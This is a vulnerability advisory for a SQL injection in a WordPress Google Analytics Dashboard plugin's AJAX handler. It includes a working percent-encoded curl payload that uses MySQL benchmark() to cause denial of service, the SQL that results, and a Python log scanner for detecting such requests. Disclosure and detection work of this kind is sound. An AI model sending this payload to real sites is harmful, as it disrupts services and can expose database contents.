CVSS Summary
Score | 7.9 High |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | Single |
Confidentiality | Complete |
Integrity | None |
Availability | Complete |
Last revised:
Google Analytics Dashboard contains an AJAX handler whose SQL statement is vulnerable to SQL injection. An attacker must be logged in to exploit this vulnerability.
The statement does not return any data to the browser, but a suitably crafted request can be used to cause a denial of service.
The following request:

```sh
curl -i -b $WORDPRESS_SESSION_COOKIE 'http://wordpress.local/wp-admin/admin-ajax.php?action=gad_fill_ppp&pid=%34%36%20%75%6E%69%6F%6E%20%61%6C%6C%20%73%65%6C%65%63%74%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%2C%6D%64%35%28%30%78%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%29%29'
```

would cause this SQL statement to be run:

```sql
SELECT count(1) FROM wp_posts WHERE post_status = 'draft' AND ID = 46 union all select benchmark(1000000000000000000000,md5(0x4646464646464646464646464646464646));
```

This would make the MySQL server spend a very long time generating MD5 hashes, so that it stops responding to legitimate queries.
An attacker who knows or can work out the ID of a draft post could also extract arbitrary data from the database.
The vulnerable query is in gad-admin-pages-posts.php at line 79.
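As an added illustration (not part of this advisory or of the plugin's code), the following Python check decodes the `pid` parameter of `gad_fill_ppp` requests found in web server access logs and flags any value that is not a plain integer, the only form the vulnerable query legitimately expects. The sample log lines are constructed; the second one carries the percent-encoded request shown above, and the fourth a constructed value with a stray quote appended.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined format, trimmed).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/2014:09:15:01 +0000] "GET /wp-admin/admin-ajax.php?action=gad_fill_ppp&pid=46 HTTP/1.1" 200 2
10.0.0.9 - - [12/Feb/2014:09:15:07 +0000] "GET /wp-admin/admin-ajax.php?action=gad_fill_ppp&pid=%34%36%20%75%6E%69%6F%6E%20%61%6C%6C%20%73%65%6C%65%63%74%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%2C%6D%64%35%28%30%78%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%29%29 HTTP/1.1" 200 2
10.0.0.5 - - [12/Feb/2014:09:15:09 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 2
10.0.0.9 - - [12/Feb/2014:09:15:12 +0000] "GET /wp-admin/admin-ajax.php?action=gad_fill_ppp&pid=46%27 HTTP/1.1" 200 2
"""

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
PLAIN_INT_RE = re.compile(r"[0-9]+")


def check_pid(url):
    """For a gad_fill_ppp request, return (decoded_pid, suspicious); otherwise None.

    The handler's query uses pid as an integer post ID, so anything other than a
    run of digits after percent-decoding cannot be a legitimate value.
    """
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if params.get("action") != ["gad_fill_ppp"]:
        return None
    pid = params.get("pid", [""])[0]
    return pid, PLAIN_INT_RE.fullmatch(pid) is None


def scan_log(text):
    """Return [(client_ip, decoded_pid)] for every flagged gad_fill_ppp request."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        result = check_pid(match.group(1))
        if result is not None and result[1]:
            hits.append((line.split(" ", 1)[0], result[0]))
    return hits


if __name__ == "__main__":
    for ip, pid in scan_log(SAMPLE_LOG):
        print(f"{ip}: pid decodes to {pid!r}")
```

The same digits-only rule, applied in the handler before `pid` reaches the query (or a parameterised query), is the server-side counterpart of this log check.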
Current state: Fixed
Version 2.0.5 has been released which addresses this problem; users running older versions should upgrade immediately.